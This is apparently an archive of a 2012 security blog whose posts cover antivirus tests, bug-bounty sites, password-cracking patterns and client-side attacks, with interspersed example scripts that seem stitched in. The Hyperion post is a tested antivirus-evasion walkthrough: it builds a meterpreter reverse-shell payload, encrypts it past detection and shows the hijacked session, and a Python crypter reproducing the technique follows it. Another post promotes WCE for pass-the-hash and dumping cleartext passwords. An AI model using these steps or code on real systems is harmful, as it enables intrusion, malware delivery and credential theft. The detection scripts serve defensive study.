Latest Security News

AV product comparison by the independent organisation av-comparatives.org


About as old as the "Linux only" versus Windows comment-thread war is the question of which AV is best to install at home, at the company, in the cloud and so on.
Apparently the need to answer this question justified creating an independent body that runs methodical tests and ranks the vendors in the various categories.
You'd be surprised, but the data is quite unexpected!
The information is accessible to everyone (the reports can be downloaded).
For your review:
I chose to present the results of a "Real-World" test conducted recently. The results cover the months August to November 2012.
As far as I can tell these are the home editions, but there are reports for corporate products as well.
FYI



Review of AV products for mobile:

Sites that permit scanning and vulnerability hunting

As is fairly clear and well known, for white-hat hackers (a more fitting Hebrew term is needed..) to scan or test a site for ways to break in, you must obtain permission from the site you want to test. Without it the activity is, of course, a violation of the law.
Surprisingly, there are a number of sites that agree to let us dig through their innards looking for vulnerabilities, and some of them will even pay you per vulnerability..
According to the blog of Dan Kaminsky, a well-known and acclaimed security figure, here are the names of the sites:

Paypal
Salesforce
Microsoft
Twitter
eBay
Adobe
Reddit
GitHub
Constant Contact
37 Signals
Zeggio
Simplify, LLC
Team Unify
Skoodat
Relaso
Modus CSR
CloudNetz
EMPTrust
Apriva

happy hunting!


HTTPS or SMTP? The trick used by the CIA director who resigned over the affair








In short: to avoid FBI interception of the SMTP (mail) traffic between him and his mistress, he opened a Gmail account and gave her the password as well.
The two of them corresponded on the same message, which was kept in the DRAFTS folder and never sent.
Another trick: editing a document inside Dropbox, on the same account, from two users.
Of course this makes interception harder and requires monitoring HTTPS instead of SMTP, which is less secure.
In any case it didn't help them, because "apparently" the FBI obtains passwords to accounts and other access that lets it index the "inside" of a mailbox at services such as Gmail, Dropbox, Yahoo, etc... A draft that is never sent still sits on the provider's servers, so a request to the provider reaches it just as a tap on SMTP would.
So b e c a r e f u l ... :-)

Weekly log, 21-27 October 2012

I thought I'd jot down for myself the headlines of security incidents and other interesting things I ran into last week. I haven't settled on which day yet, but the idea is to keep it up... hmm, hard... OK, let's start with an experiment:

21-27 October 2012

  1. Java update: the same old tune again... for anyone who hasn't updated yet, now is the time to upgrade to 6u37 or 7u9. You can start by identifying the installed Java version through this site and then proceed to the Java site to upgrade, or alternatively upgrade automatically. By the way, for the latest vulnerability submitted for review by a Polish security researcher there is still no fix; according to Oracle it will be handled in the first quarter of 2013. Anyone who has no need to run Java-based applications is advised to remove the Java browser plugin, and in any case to work with Chrome or Firefox and N O T with IE.


2. A penetration attempt and cyber attack on police computers. More details here. From a first reading, the attempt resembles dozens of attempts to persuade someone to click a link or open a file sent by mail; usually such mails are tied to cybercrime, but in this specific case it may have been a cyber-terror attack by Iran (so claim the security experts who investigated the matter). Somewhat puzzling in my eyes is the extreme step of disconnecting the police computers from the Internet and from other systems for fear of data leakage, and in addition blocking USB flash drives (DOK) across the whole organisation.
    • Doesn't the police have data-leakage monitoring systems running in the background all the time?
    • Doesn't the police have the ability to analyse suspicious connections from inside the organisation to the Internet?
    • Why aren't USB drives blocked by default?
    • Beyond the antivirus installed on the mail system, why doesn't the police block E V E R Y dangerous file type such as EXE and DLL??? Every file of that kind should be diverted to a special mailbox that only information-security staff can release from.
    • In short, it looks like panic, and drastic decisions were made here in abundance.
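One way to do what the last bullet asks for, as an added example (not the police's or any vendor's code): a gateway-side check that diverts a message to a security-team mailbox when an attachment carries an executable extension or, more importantly, executable content under a harmless-looking name. The blocked-extension list, the quarantine address, the recipients and the sample message are all constructed for the demo.

```python
"""Mail-gateway attachment check: divert messages carrying executable content
to a security-team mailbox instead of relying only on the gateway antivirus.
Added example (not the blog's or any vendor's code).  The policy lists and
the sample message are constructed for the demo."""
import email
from email import policy
from email.message import EmailMessage

# Extensions to divert regardless of content (constructed policy list).
BLOCKED_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".pif", ".cpl", ".js", ".vbs", ".jar"}
# Content sniffing: a renamed .exe still starts with the PE 'MZ' header.
MAGIC = {b"MZ": "pe-executable", b"\x7fELF": "elf-executable"}


def classify_attachment(filename: str, data: bytes) -> list[str]:
    """Return the reasons this attachment should be diverted (empty = clean)."""
    reasons = []
    name = (filename or "").lower()
    ext = name[name.rfind("."):] if "." in name else ""
    if ext in BLOCKED_EXTENSIONS:
        reasons.append(f"blocked extension {ext}")
    # invoice.pdf.exe is caught above; also catch invoice.exe.pdf-style tricks
    # by looking at every inner dotted component.
    parts = name.split(".")
    if len(parts) > 2 and any("." + p in BLOCKED_EXTENSIONS for p in parts[1:-1]):
        reasons.append("executable extension hidden in double extension")
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            reasons.append(f"content is a {kind} regardless of name")
            break
    return reasons


def inspect_message(raw: bytes) -> dict[str, list[str]]:
    """Map attachment filename -> reasons; an empty dict means deliver normally."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = {}
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True) or b""
        reasons = classify_attachment(part.get_filename(), payload)
        if reasons:
            findings[part.get_filename() or "<unnamed>"] = reasons
    return findings


def route(raw: bytes, quarantine_box: str = "secops-quarantine@example.org") -> str:
    """Delivery target: the original recipient, or the review mailbox that only
    the security team releases from."""
    if inspect_message(raw):
        return quarantine_box
    return str(email.message_from_bytes(raw, policy=policy.default)["To"])


def build_sample(filename: str, content: bytes) -> bytes:
    """Constructed test message with one attachment."""
    msg = EmailMessage()
    msg["From"] = "hr@example.org"
    msg["To"] = "officer@police.example"
    msg["Subject"] = "Please review"
    msg.set_content("See the attached file.")
    msg.add_attachment(content, maintype="application", subtype="octet-stream", filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    for name, blob in [("report.pdf", b"%PDF-1.4 ..."),
                       ("report.pdf.exe", b"MZ\x90\x00"),
                       ("report.pdf", b"MZ\x90\x00")]:   # renamed executable
        print(name, "->", route(build_sample(name, blob)))
```

The third sample is the case an extension filter alone misses: a PE file renamed to .pdf. Sniffing the first bytes costs nothing and is what turns an extension blocklist into a content policy.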
  

Radware launches new DDoS security site

 www.DDoSWarriors.com  
Provides comprehensive analysis on DoS and DDoS attack tools, trends, and threats
There is very interesting and comprehensive material here on denial-of-service attacks, tools, news, etc.
I've had the chance to meet and even hear a lecture from Radware's experts, and there is clearly a huge and unique body of knowledge there.
Recommended!



Antivirus evasion technique: the Hyperion tool

A special method that uses encryption to prevent a malicious file from being detected by antivirus products

Here are the instructions, for bt5r3, for compiling the Hyperion code and using it on a chosen EXE:
I tested it and it works!


taken  from 
****
I recently watched a presentation that rel1k gave at BSides Cleveland 2012, in which he revealed some of his top-secret antivirus bypass techniques. He quickly explained and demonstrated binary droppers, shellcodeexec, PowerShell injection, modifying Metasploit payload templates, and PE crypters. This last one caught my attention, as I hadn’t heard of it before. The PE crypter that he demonstrated is called Hyperion, by nullsecurity. It works somewhat like a PE packer, but instead of scrambling the payload and encapsulating it with explicit instructions on how to descramble it, the payload is encrypted with a weak 128-bit AES key and encapsulated with a stub that simply brute-forces the key at execution time. Let’s try it out. Only the source files are made available, so we’ll have to compile it ourselves. Luckily, BackTrack provides the tools needed to cross-compile executables.
root@bt:~# wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
root@bt:~# unzip Hyperion-1.0.zip 
root@bt:~# cd Hyperion-1.0
root@bt:~/Hyperion-1.0# wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
Now that we have our Hyperion crypter executable, let’s create a Metasploit payload.
root@bt:~/Hyperion-1.0# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe
Before we encrypt our payload, let’s see if Microsoft Security Essentials (MSE) detects anything.
As you can see, MSE detected our payload as “Trojan:Win32/Swrort.A”. That’s no good, but that’s what Hyperion is supposed to help us get around. So, let’s try encrypting our payload.
root@bt:~/Hyperion-1.0# wine crypter.exe payload.exe encrypted_payload.exe

Opening payload.exe
Copied file to memory: 0x115818
Found valid MZ signature
Found pointer to PE Header: 0xe8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

Found Section: .text
VSize: 0xa966, VAddress: 0x1000, RawSize: 0xb000, RawAddress: 0x1000

Found Section: .rdata
VSize: 0xfe6, VAddress: 0xc000, RawSize: 0x1000, RawAddress: 0xc000

Found Section: .data
VSize: 0x705c, VAddress: 0xd000, RawSize: 0x4000, RawAddress: 0xd000

Found Section: .rsrc
VSize: 0x7c8, VAddress: 0x15000, RawSize: 0x1000, RawAddress: 0x11000

Input file size + Checksum: 0x1204e
Rounded up to a multiple of key size: 0x12050
Generated Checksum: 0x5e921e
Generated Encryption Key: 0x2 0x3 0x0 0x3 0x0 0x3 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0

Written encrypted input file as fasm array to:
-> Src\FasmContainer32\infile.asm

Written input file's image base to:
-> Src\FasmContainer32\imagebase.asm

Written input file's image size to:
-> Src\FasmContainer32\sizeofimage.asm

Written keysize to:
-> Src\FasmContainer32\keysize.inc

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm encrypted_payload.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

root@bt:~/Hyperion-1.0# flat assembler  version 1.69.31  (1310719 kilobytes memory)
5 passes, 0.5 seconds, 92672 bytes.

root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rwxr-xr-x 1 root root  92672 2012-08-02 16:53 encrypted_payload.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe
And if we copy our encrypted payload to our Windows host…
Ah, nothing to see here :-) Let’s see if it works.
msf  exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:443 -> 192.168.10.129:1047) at 2012-08-02 17:17:53 -0400

msf  exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  VULNXP\Administrator @ VULNXP  192.168.10.128:443 -> 192.168.10.129:1047 (192.168.10.129)
Oh, you know that’s right!
You’ll notice that I didn’t upload this to VirusTotal to see how many anti-virus vendors detect our payload as malicious. It’s pretty well known now that this is one place anti-virus vendors go to find new payloads that they need to create signatures for. So, your best option for testing custom payloads is simply to install the version of anti-virus that you are trying to bypass.
Also, as rel1k stated in his presentation, the stub used to encapsulate the payload is static, so anti-virus vendors could easily create a signature for these payloads. He suggests modifying the source so that it is polymorphic. Alas, I have no idea how to do that right now, so maybe we will cover that in a later post. Happy Crypting!
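The scheme described above, reduced to its essentials as an added example (this is not Hyperion's code): the payload gets a length-plus-checksum header, is padded to the key size and encrypted under a key that carries only a few bits of entropy; the container never stores the key, and the stub rediscovers it by exhausting that tiny key space until the checksum verifies. Two things here are assumptions rather than Hyperion's actual parameters: a SHA-256-based keystream stands in for AES-128 so the script needs only the standard library, and the key shape (six key bytes in 0..3, the rest zero) is modelled on the key printed in the transcript above.

```python
"""Weak-key crypter in the style of Hyperion (AES-128 payload, tiny key space,
brute-forced by the stub at run time).  Added example, not Hyperion's code.
Assumptions: the keyed stream below (SHA-256 in counter mode) stands in for
AES-128 so the script needs only the standard library; the key space (six
key bytes, each 0..3, the rest zero) mirrors the shape of the key printed in
the transcript above but is an assumption about Hyperion's real parameters."""
import hashlib
import os
import struct
import zlib
from itertools import product

KEY_SIZE = 16          # bytes, as for AES-128
VARIABLE_BYTES = 6     # only these key bytes carry entropy (assumption)
BYTE_RANGE = 4         # each variable byte is drawn from 0..3 (assumption)
HEADER = struct.Struct("<II")  # original length, CRC32 of the plaintext


def keystream(key: bytes, length: int) -> bytes:
    """Deterministic keystream: SHA-256(key || block counter). Stand-in for AES."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "little")).digest()
        counter += 1
    return bytes(out[:length])


def xor(data: bytes, ks: bytes) -> bytes:
    n = len(data)
    return (int.from_bytes(data, "little") ^ int.from_bytes(ks[:n], "little")).to_bytes(n, "little")


def generate_weak_key() -> bytes:
    """Key with only VARIABLE_BYTES low-entropy bytes, like the
    '0x2 0x3 0x0 0x3 0x0 0x3 0x0 ...' key in the transcript."""
    variable = bytes(b % BYTE_RANGE for b in os.urandom(VARIABLE_BYTES))
    return variable + bytes(KEY_SIZE - VARIABLE_BYTES)


def encrypt_payload(payload: bytes) -> tuple[bytes, bytes]:
    """Prepend length + CRC32 (the checksum the stub verifies), pad to the key
    size, encrypt.  Returns (container_body, key); the key is NOT stored in
    the container, the stub rediscovers it."""
    key = generate_weak_key()
    body = HEADER.pack(len(payload), zlib.crc32(payload)) + payload
    body += b"\0" * (-len(body) % KEY_SIZE)   # round up to a multiple of key size
    return xor(body, keystream(key, len(body))), key


def brute_force_decrypt(container: bytes) -> tuple[bytes, bytes, int]:
    """What the stub does at run time: try every key in the small key space
    until the decrypted header's CRC32 matches the decrypted payload."""
    tries = 0
    for combo in product(range(BYTE_RANGE), repeat=VARIABLE_BYTES):
        tries += 1
        key = bytes(combo) + bytes(KEY_SIZE - VARIABLE_BYTES)
        # Cheap pre-check: decrypt only the header and see whether the stored
        # length is consistent with the container size (padding < KEY_SIZE).
        length, crc = HEADER.unpack(xor(container[:HEADER.size], keystream(key, HEADER.size)))
        if not 0 <= len(container) - HEADER.size - length < KEY_SIZE:
            continue
        plain = xor(container, keystream(key, len(container)))
        candidate = plain[HEADER.size:HEADER.size + length]
        if zlib.crc32(candidate) == crc:
            return candidate, key, tries
    raise ValueError("no key in the search space reproduced the checksum")


def key_space_size() -> int:
    return BYTE_RANGE ** VARIABLE_BYTES   # 4096 candidates: cheap at run time


if __name__ == "__main__":
    fake_pe = b"MZ" + os.urandom(3000)     # constructed stand-in for payload.exe
    blob, real_key = encrypt_payload(fake_pe)
    recovered, found_key, tries = brute_force_decrypt(blob)
    assert recovered == fake_pe and found_key == real_key
    print(f"key space {key_space_size()}, recovered after {tries} tries")
```

The point the numbers make: with 4096 candidates the stub finishes in a fraction of a second, while a scanner looking at the file on disk sees only high-entropy bytes and a stub that contains no key. The flip side, as rel1k notes, is that the stub itself is constant, so the same brute-force loop and header layout are exactly what a signature will key on.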


Recommended talk by Iftach Amit: Sexy Defense

From DerbyCon 2012: a lecture by Iftach Amit about playing good defense.
Watch it.

Cyber Security Events Time Line




A very nice timeline of events which includes cyber crime, cyber warfare and other important security events.

check it out here


Cool SciFi Name Generator


Need a nickname? A fake identity?
Consider trying this site:

Windows Credentials Editor recommended: post-exploitation password dumping, pass-the-hash, Kerberos and more


A tool for exposing passwords and for PASS THE HASH that also works on Windows 7 and Server 2008.
What makes it special is that the read is done directly from memory and not through files (SAM, registry, etc.).
Don't forget to try wce -w (dump the cleartext passwords kept in memory by the authentication packages).
:-)


taken from their site:

What is WCE?
Windows Credentials Editor (WCE) is a security tool that lets you list Windows logon sessions and add, change, list and delete the associated credentials (e.g. LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:
  • Perform Pass-the-Hash on Windows
  • 'Steal' NTLM credentials from memory (with and without code injection)
  • 'Steal' Kerberos Tickets from Windows machines
  • Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
  • Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.

What is the current version?
The current version of WCE 32-bit is v1.3beta (download here); the current version of WCE 64-bit is v1.3beta (download here).
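The detection side of the same fact, as an added example (not WCE's code or any vendor's rule): to read credentials "directly from memory" a tool has to open a handle to lsass.exe with memory-read rights, and an endpoint sensor that records process-access events sees that handle being opened. The log lines below are constructed in the shape of a Sysmon Event ID 10 (ProcessAccess) record, the access-right constants are the standard Windows PROCESS_* values, and the allow-list of processes that legitimately touch LSASS is an assumption to be tuned per estate.

```python
"""Detecting credential dumping of the WCE/mimikatz kind: the tool must open a
handle to lsass.exe with read access, which an endpoint sensor records.
Added example, not WCE's code or any vendor's rule.  The log lines are
constructed in the shape of Sysmon Event ID 10 (ProcessAccess) key=value
output; the allow-list and thresholds are assumptions to tune per estate."""
import re
from collections import defaultdict

# Windows process access rights relevant to reading another process's memory.
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_VM_OPERATION = 0x0008
PROCESS_CREATE_THREAD = 0x0002
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_ALL_ACCESS = 0x1FFFFF

# Processes legitimately touching LSASS on this (assumed) build; tune per estate.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

FIELD = re.compile(r'(\w+)=((?:"[^"]*")|\S+)')


def parse_event(line: str) -> dict:
    """Parse 'Key=Value Key="quoted value"' lines into a dict (keys lower-cased)."""
    return {k.lower(): v.strip('"') for k, v in FIELD.findall(line)}


def is_lsass_access(ev: dict) -> bool:
    return ev.get("eventid") == "10" and ev.get("targetimage", "").lower().endswith(r"\lsass.exe")


def suspicious_reasons(ev: dict) -> list[str]:
    """Why an LSASS ProcessAccess event looks like a credential dump."""
    if not is_lsass_access(ev):
        return []
    reasons = []
    src = ev.get("sourceimage", "").lower()
    granted = int(ev.get("grantedaccess", "0x0"), 16)
    if src not in ALLOWED_SOURCES:
        reasons.append(f"unexpected source {src}")
    if granted & PROCESS_VM_READ:
        reasons.append("PROCESS_VM_READ on lsass (memory read, as WCE/mimikatz need)")
    if granted & (PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD):
        reasons.append("write/thread rights on lsass (code injection)")
    if granted == PROCESS_ALL_ACCESS:
        reasons.append("PROCESS_ALL_ACCESS requested")
    # Reads from an allow-listed AV/OS process are expected; only alert when
    # memory is read by something else or injection rights are requested.
    if src in ALLOWED_SOURCES and not (granted & (PROCESS_VM_WRITE | PROCESS_CREATE_THREAD)):
        return []
    return reasons


def scan(lines: list[str]) -> dict[str, list[str]]:
    """Map host -> list of alert strings over a batch of events."""
    alerts = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        reasons = suspicious_reasons(ev)
        if reasons:
            alerts[ev.get("computer", "?")].append(f"{ev.get('sourceimage')}: " + "; ".join(reasons))
    return dict(alerts)


# Constructed sample events (not real telemetry).
SAMPLE_LOG = [
    'EventID=10 Computer=WS01 SourceImage="C:\\Program Files\\Windows Defender\\MsMpEng.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" GrantedAccess=0x1010',
    'EventID=10 Computer=WS01 SourceImage="C:\\Users\\bob\\Desktop\\wce.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" GrantedAccess=0x1010',
    'EventID=10 Computer=WS02 SourceImage="C:\\Windows\\System32\\svchost.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" GrantedAccess=0x1FFFFF',
    'EventID=10 Computer=WS02 SourceImage="C:\\Temp\\update.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" GrantedAccess=0x143A',
    'EventID=1 Computer=WS03 Image="C:\\Windows\\System32\\notepad.exe"',
]

if __name__ == "__main__":
    for host, items in scan(SAMPLE_LOG).items():
        for item in items:
            print(host, item)
```

The allow-list is the part that needs care: the AV engine reading LSASS with 0x1010 is routine, but an allow-listed svchost.exe asking for PROCESS_ALL_ACCESS is how injected or masqueraded tooling shows up, so the rule still fires on write or thread rights from trusted images.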

Best Google search-fu ever: new tool




DEFCON 2012 talks are slowly starting to flow onto YouTube; one of them is already here and presents a new version of a Google dorking tool, the best I've seen to date.
The tool has dozens of features, so I w a r m l y recommend watching these guys' talk h e r e
It can be downloaded from h e r e

We have a crack!! ---- more on password cracking




The past year has been packed with leaks of databases containing passwords.

Giant sites such as LinkedIn and RockYou were attacked, usually through SQL injection, and exposed millions of user passwords, some hashed and some not.
Such a large exposure of "real-world" passwords, beyond reflecting the dismal security posture of large companies, allows statistical research and analysis of the patterns users follow when choosing passwords (and you'd be surprised how thoroughly unoriginal we are..).

Such research was done by KoreLogic Security. The company runs password-cracking contests and publishes the cracking methods, including statistical insights, lists of common words, rules for John the Ripper, and a ranking of the recommended cracking tools according to the contest results.

A small anecdote I wanted to dwell on concerns a tool I hadn't known about called hashcat, which also has a GUI version.
What is unique about this tool, beyond its convenience, is its use of GPUs (graphics cards) for the cracking work; it supports chaining up to 120 cards!!! This tool is also usually the big winner of the password-cracking contests held at DEFCON by KoreLogic Security.

I recommend reading the research and downloading the word lists.

So what have the hackers learned and turned into password-cracking rules?

Rules that already exist in John the Ripper's rule engine:

  1. Appending digits to the end of the password
  2. Capital letter at the start of every word
  3. Appending ! to a word that starts with a capital letter
  4. Adding 123 at the start or end of the password
  5. Variations on the user name (adding special characters, digits, etc.)
Extended rules added by KoreLogic:
  1. 4 letters + 4 digits, or 5 letters + 3 digits, or 3 letters + 5 digits: Nove2010  Fall2010
  2. Adding 1234 at the start or end of the password: 1234pass  !QAZ1234
  3. Using the current year as the number inside the password: !Jan2012   2012!!   Work2012aha
  4. Using the current or previous year as a number plus a special character: 2010ly!!   2001MARK2010!!   2010#dec
  5. Months and days at the start, middle or end of the password: January!2006  March#16  OctO2008$ Octo2**9   Octob!!05 Friday.56  Thursday99=
  6. Adding special characters at the end or start of the password: !1q1q1q1q !! -FRANCE#  BonJovi@
  7. Special characters inserted in a "special" way: Africa!1   AmyOct!1   Kar!dani1 T@Y!OR1  b@byg!r1  Amanda!1  A!lison1   We!come1 S!LVER1  Amelia7!1
  8. Finger patterns: users love passwords that follow the key layout on the keyboard, for example:
    1. !1234qwe   !@#$QWE ASDFqwer !QWERTY  NHY^5tgb
  9. Words related to production, development or test environments: Prod!111  prod@123 TEST-CO   test!ng

Word lists that have had good success (can be downloaded from their site):


Seasons - Months - Years - First Names - Last Names - Cities - States -
Regions - Countries - "RockYou" List - Regions of India/China/USA -
Religious references (books of the Bible, lists of Gods, etc) - keyboard
combinations - 4 letter words - 5 letter words - 6 letter words - 7 letter
words - Sports Teams - Colleges - Client specific words - Dates -
Numbers - Common wordlists – Facebook Names List (‘fbnames’)

Sweeping conclusions:

  1. Password complexity rules do not make users choose "better" passwords; they force users into tricks or patterns, and those patterns are easy to predict and to crack in a short time.
  2. Passwords for Internet services are even less secure and easier to crack than corporate internal ones.
  3. Move to two-factor authentication wherever possible (Google, Yahoo, etc.).
  4. Corporations: learn the patterns common in your organisation and restrict them by technical means (yes, yes, try cracking your own employees' passwords :-)).
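A concrete form of conclusion 4, as an added example (not KoreLogic's or John the Ripper's code): a small audit script that classifies each password from a cracked dump against the patterns listed above and counts how often each pattern appears in the organisation. The regexes are this editor's reading of the pattern list, the "current year" rule uses today's date, and the sample passwords are constructed from the shapes quoted above rather than taken from any real dump.

```python
"""Password-pattern audit: classify cracked (or to-be-cracked) passwords
against the KoreLogic-style patterns listed above and report how common each
is.  Added example, not KoreLogic's or John the Ripper's code; the regexes
are this editor's reading of the pattern list and the sample passwords are
constructed."""
import re
from collections import Counter
from datetime import date

MONTHS = "jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec"
DAYS = "monday|tuesday|wednesday|thursday|friday|saturday|sunday"
CURRENT_YEAR = date.today().year
KEYBOARD_WALKS = ["qwerty", "qwer", "asdf", "zxcv", "1234", "!@#$", "1q2w", "qaz", "wsx", "edc", "tgb", "yhn"]

PATTERNS = {
    "digits appended":        re.compile(r"^[A-Za-z]+\d+$"),
    "capitalised first":      re.compile(r"^[A-Z][a-z]+"),
    "! appended":             re.compile(r"!$"),
    "123/1234 affix":         re.compile(r"^(123|1234)|(123|1234)$"),
    "letters+digits 8-char":  re.compile(r"^(?:[A-Za-z]{4}\d{4}|[A-Za-z]{5}\d{3}|[A-Za-z]{3}\d{5})$"),
    "year 20xx/19xx":         re.compile(r"(?:19|20)\d\d"),
    "month or day name":      re.compile(rf"(?i)(?:{MONTHS})[a-z]*|(?:{DAYS})"),
    "special char affix":     re.compile(r"^[^A-Za-z0-9]|[^A-Za-z0-9]$"),
    "special inside word":    re.compile(r"[A-Za-z0-9][^A-Za-z0-9][A-Za-z0-9]"),
    "prod/test words":        re.compile(r"(?i)prod|test|dev"),
}


def keyboard_walk(pw: str) -> bool:
    low = pw.lower()
    return any(w in low for w in KEYBOARD_WALKS)


def recent_year(pw: str) -> bool:
    """Year equal to the current or previous year (the rule KoreLogic added)."""
    return any(str(y) in pw for y in (CURRENT_YEAR, CURRENT_YEAR - 1))


def classify(pw: str) -> set[str]:
    """Names of every listed pattern the password matches (empty = no known pattern)."""
    hits = {name for name, rx in PATTERNS.items() if rx.search(pw)}
    if keyboard_walk(pw):
        hits.add("keyboard walk")
    if recent_year(pw):
        hits.add("current/previous year")
    return hits


def pattern_report(passwords: list[str]) -> Counter:
    """How many passwords in the set match each pattern (most common first)."""
    counts = Counter()
    for pw in passwords:
        counts.update(classify(pw))
    return counts


def unpatterned(passwords: list[str]) -> list[str]:
    """Passwords that match none of the listed patterns; the rest are the
    cheap wins for a rule-based cracker."""
    return [pw for pw in passwords if not classify(pw)]


# Constructed sample built from the shapes listed above (not a real dump).
SAMPLE = ["Nove2010", "Fall2010", "!QAZ1234", "1234pass", "Work2012aha", "2010#dec",
          "January!2006", "Friday.56", "BonJovi@", "We!come1", "!1234qwe", "NHY^5tgb",
          "prod@123", "test!ng", "Amanda!1", "xk9vl2pqmt"]

if __name__ == "__main__":
    for name, n in pattern_report(SAMPLE).most_common():
        print(f"{n:3d}  {name}")
    print("no known pattern:", unpatterned(SAMPLE))
```

Run it over the output of a cracking job against your own directory: the report tells you which rules to block in the password filter (year suffixes and keyboard walks are the usual leaders), and the unpatterned list is the small set of users whose passwords a rule-based attack would actually have to brute-force.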












Mark Russinovich on trends in information security


Mark Russinovich, for those who don't know, is the legend who wrote the free SYSINTERNALS TOOLS familiar to every admin and computer person anywhere.
Legend has it that he understands Microsoft systems better than the developers of those systems themselves :-),
In the end Microsoft brought him into its ranks (acquiring Sysinternals in 2006), but to their credit they kept the tools he developed free.
In one of the podcasts he recently appeared on, talking about the books he writes,
he speaks about the future of information security in the third era of computing: the era of cloud and mobile.
The first era was the MAINFRAME, the second the CLIENT-SERVER era.

Here is the transcript of the conversation (I'll translate it at some point)
Very interesting:



MARK:  Well, the bigger trends, I think we're right in the middle of the third disruption in the computer industry, the first one being the mainframes, the second one being client-server, and this one being cloud and mobile.  So that's one that's affecting everybody and the way that everybody thinks about software, from enterprise developers to ISVs to consumers.  But underneath that, as far as security goes, I think that what we're seeing - and I've been a proponent of this form of security, the security technique, the security mechanism since shortly after 2000, when I started to really focus on what my software company, Winternals at the time, could do from a security perspective, and that is whitelisting.  Back then whitelisting was something that nobody used.  Windows and UNIX had some whitelisting capabilities, but very, very few people used it.  And that's been the case up until very recently.

And people I don't think are really aware of this, but now whitelisting has become one of the key security features of the modern client platforms.  When you look at iOS, for example, Apple's ecosystem, it's a complete whitelisted ecosystem.  The whitelist, you can only run the software on the phones that have been approved by Apple and curated by Apple.  Apple is essentially creating their whitelist in their Apple store.  And that has made those platforms - Android's got one.  It's not as well curated, so we've seen a problem with that.  And then Windows Phone's got a curated whitelist, as well, and Windows 8 does, too, that those whitelists, you see the dramatic impact on the security of the system by having that whitelisting in place.  Even if there is - and the sandboxing that goes with the whitelisting, as well.  So I think I feel somewhat vindicated because I've always believed whitelisting would come back and become one of the primary tools in a cybersecurity posture or platform.  And we're seeing that with the cloud platforms really adopting it and seeing the dramatic effects of that being in place.

Client Side Attacks


taken from :






Industrializing Client Side Attacks

Introduction

Cybercrime has evolved into an industry whose value in fraud and stolen property exceeded one trillion dollars in 2009. By contrast, in 2007, professional hacking represented a multibillion-dollar industry. What explains this rapid growth? Industrialization. Just as the Industrial Revolution advanced methods and accelerated assembly from single to mass production in the 19th century, today’s cybercrime industry has similarly transformed and automated itself to improve efficiency, scalability, and profitability.

The industrialization of hacking coincides with a critical shift in focus. Previously, hackers concentrated attacks on breaking perimeter defences. But today, the goal has changed. The objective is no longer perimeter penetration and defense. Today’s hacker is intent on seizing control of data and the applications that move this data. This is why attacks against Web applications constitute more than 60 percent of total attack attempts observed on the Internet.

Today's Hacking Scene 

Today’s complex hacking operation now utilizes teamwork, global coordination, and sophisticated criminal techniques designed to elude detection. In recent years, a clear definition of roles and responsibilities has developed within the hacking community forming a supply chain that resembles that of a drug cartel. Additionally, the machine of choice is the botnet – armies of unknowingly enlisted computers controlled by hackers. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. Researchers estimate that some 14 million computers have already been enslaved by botnets. 

Improvements in automated and formalized attack tools and services have introduced a new set of security problems for businesses. Of the top 10 data breaches in 2009, half involved stolen laptops, while the other half involved Web and database assaults.

Client side attacks are on the rise

Client-side vulnerabilities are among the biggest threats facing users. There has been a gradual shift to the client side because server-side applications have been attackers' targets since 2001 and have matured somewhat. Attackers are therefore going after weaknesses in desktop applications such as browsers, media players, common office applications and e-mail clients. The remedy is to maintain current application patch levels, keep antivirus software updated, and seek out and remove unauthorized applications.

Understanding client side attacks 

In order to understand client-side attacks, let us briefly describe server-side attacks that we can contrast to client-side attacks. Servers expose services that clients can interact with. These services are accessible to clients that would like to make use of these services. As a server exposes services, it exposes potential vulnerabilities that can be attacked. Merely running a server puts oneself at risk, because a hacker can initiate an attack on the server at any time. 

